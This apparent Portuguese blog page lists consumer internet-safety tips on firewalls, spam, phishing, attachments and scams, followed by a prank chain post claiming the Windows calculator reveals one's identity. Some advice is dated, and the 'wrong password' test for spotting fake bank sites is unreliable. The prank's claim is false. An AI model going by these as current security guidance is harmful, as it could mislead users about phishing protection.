3) Instale um bom programa de firewall e o configure para proteção intermediária ou máxima. Caso tenha problemas para executar tarefas no seu computador depois disso poderá ir diminuindo o nível de proteção ou excluindo certas funções. Algumas boas opções gratuitas na internet são: Comodo Personal Firewall (www.comodo.com - o melhor, na minha opinião), Sygate Personal Firewall (agora retirado pela Symantec, que incorporou a Sygate), Zone Alarm, Kerio Personal Firewall e Agnitum Outpost Firewall.
4) Use o filtro de SPAM fornecido por seu provedor, ou se não for disponível adquira um para utilizar junto ao seu cliente de email. Ter um sistema capaz de filtrar as mensagens de SPAM de forma eficaz é importante pois grande parte dos e-mails com arquivos maliciosos anexados são normalmente identificados como SPAM.
5) Configure seu Navegador (Internet Explorer, FireFox, Netscape...) para que peça SEMPRE autorização e confirmação antes de baixar ou executar qualquer coisa na internet. Depois não autorize ele a baixar nada a não ser que saiba muito bem do que se trata. Como regra nunca execute/abra códigos diretamente da internet, se necessário os baixe/salve e rode depois.
6) Antes de utilizar um novo site de compras e fornecer dados dos seus cartões de credito ou banco, procure informações sobre sua credibilidade, confiabilidade, solidez, segurança e eficiência. Também verifique que o site utilize, para a troca de dados e informações, uma área segura baseada em criptografia (SSL). Para isso confirme que no seu navegador apareça um pequeno cadeado fechado ou uma chave no canto inferior da tela.
7) Desconfie e rejeite comunicados, propostas e ofertas milagrosas de qualquer tipo que possam chegar por qualquer meio (email, MSN, salas de bate-papo, P2P, chat systems em geral etc...).
8) Nunca anote senhas e outras informações confidenciais em lugares de fácil acesso (inclusive arquivos não criptografados dentro do seu computador) ou visíveis.
9) Criminosos podem criar sites que parecem os de bancos ou outras entidades, com o intuito de enganar as vítimas desavisadas e de capturar suas senhas e dados sigilosos. Neste caso o primeiro cuidado é verificar se o endereço que aparece no browser é mesmo o do banco e se este permanece inalterado na hora que aparecer o site. O segundo cuidado é o chamado teste da senha errada ou do "falso positivo". É só tentar acessar utilizando uma senha propositalmente errada e ver se o site aceita esta senha. Sites falsos aceitam qualquer coisa, já os verdadeiros sabem reconhecer a senha válida de uma errada.
10) Se lembre que a enorme maioria dos casos de fraudes envolvendo internet banking acontece por descuidos do usuário e não por falhas de segurança do bancos. Portanto tome sempre os devidos cuidados quando acessar sua conta e, de forma geral, usar o seu computador.
11) Sempre e só utilize um computador confiável para acessar sua conta e/ou dados sigilosos. NUNCA use computadores públicos ou de terceiros ou ainda computadores que não tenham sistemas de proteção eficientes para acessar sua conta ou qualquer outra informação sigilosa ou que necessite de uma sua senha (por exemplo uma caixa de email).
12) Evite navegar em sites arriscados e NUNCA baixe qualquer coisa de site que não conheça bem e que não sejam totalmente confiáveis. Como regra geral, sites com material pornográfico e sites que promovem pirataria de software e outros crimes, são perigosos pois freqüentemente contém vírus, trojans ou outros programas maliciosos.
13) Nunca responda à e-mails não solicitadas (SPAM), nem para pedir sua remoção de listas de envio ou para reclamar ou solicitar qualquer informação. Eles usam sua resposta para confirmar a existência do seu endereço de email e aí sim que não irão parar nunca. Também não clique em links de descadastramento ou de forma geral em qualquer tipo de link ou site sugerido ou de outra forma presente nestas mensagens.
14) Nunca execute ou abra qualquer arquivo anexado a mensagens de origem desconhecida ou não solicitadas. Sobretudo NÃO abra arquivos dos tipos: EXE COM SCR PIF BAT CMD DPR ASX. Também lembre de configurar o seu programa cliente de email (Outlook, Eudora, Thunderbird...) para que não abra automaticamente os anexos. Na maioria dos casos estes programas são vírus ou trojans ou worms.
15) Não se assuste quando receber e-mails ameaçadores tipo cobranças, cancelamento de documentos ou benefícios, ações na justiça etc... Também desconfie de mensagens que aparentem ter sido enviadas por bancos, repartições públicas, lojas famosas e programas televisivos. Não acredite e não leve a sério este tipo de mensagens, os respectivos órgãos e empresas NUNCA enviam mensagens por email com este intuito. Sobretudo NÃO abra nenhum arquivo anexado a este tipo de e-mails nem acesse nenhum link sugerido.
16) Não acredite em promessas milagrosas, ofertas mirabolantes, propostas fabulosas e também não acredite em vendas simplificadas de produtos ou serviços que deveriam estar sujeitos a controle (tipo medicamentos ou coisas parecidas). Na maioria dos casos se trata de golpes ou produtos falsificados e até perigosos ou prejudiciais.
17) Não forneça seu endereço de email para publicação em fóruns, salas de bate papo e grupos de discussão. A mesma regra vale para qualquer outra informação pessoal como nome completo, endereço, telefone, números de documentos (RG, CPF, CNH...), lugar de trabalho etc... Se não puder evitar de publicar em algum lugar um endereço de e-mail, substitua o "@" com "(ARROBA)".
18) Evite sempre participar de qualquer tipo de corrente na rede, sejam pirâmides financeiras sejam supostas ou reais campanhas de solidariedade seja o que for. Também desconfie muito de qualquer oferta que lhe chegue pela rede e onde exista a solicitação de um pagamento adiantado.
19) Crie um endereço de email alternativo em algum serviço gratuito de webmail (BOL, Hotmail, Yahoo, Gmail, IG...) e utilize exclusivamente este endereço (e não o seu pessoal e/ou profissional) para cadastramento em sites, fóruns, blogs, bate papos etc...quando isso for inevitável.
20) Se recuse a abrir qualquer mensagem suspeita onde não seja claramente definida a identidade de quem a envia (endereços falsos, endereços omissos ou incompletos, assuntos com erros ou incongruentes...). A mesma regra vale para sites que proponham vendas de produtos ou serviços mas que tenham poucos dados, sem endereços e telefone de contato, sem nomes de empresas ou pessoas para contatar etc... É importante também lembrar que, em qualquer mensagem de e-mail, o endereço do remetente é muito fácil de se falsificar. Por isso não confie automaticamente em mensagens que "parecem" ter sido enviadas por seus contatos. Use seu senso crítico e um pouco de desconfiança pois existem muitos casos de fraude com e-mails que usam maliciosamente os nomes de pessoas conhecidas da vítima. teh +
A MICROSOFT SABE QUEM VC É, GENTE É !!!
a microsoft sabe kem eh vc....... olhemA MICROSOFT SABE QUEM VC É, GENTE É INCRIVELLLComo é q eles conseguem gente é incrivelll...saiu no jornal essa notica...duvida??!!! pois teste vc mesmo...siga as instruções....
APARECE SEU NOME E EMAIL E ALGO MAIS
TA DUVINDANDO FAÇA O TESTE
1- Vá ao menu iniciar
2- Programas
3- Acessórios
4- Calculadora
5- Clique no menu calculadora na opção exibir
6- Mude para opção cientifica
7- Agora digite 12237514
8- No canto superior Esquerdo está selecionado Decimal (dec)
9- Clique na opção Hexadecimal (hex) e incrivelmente veja sua indentificação!!!!
Assinar:
Postagens (Atom)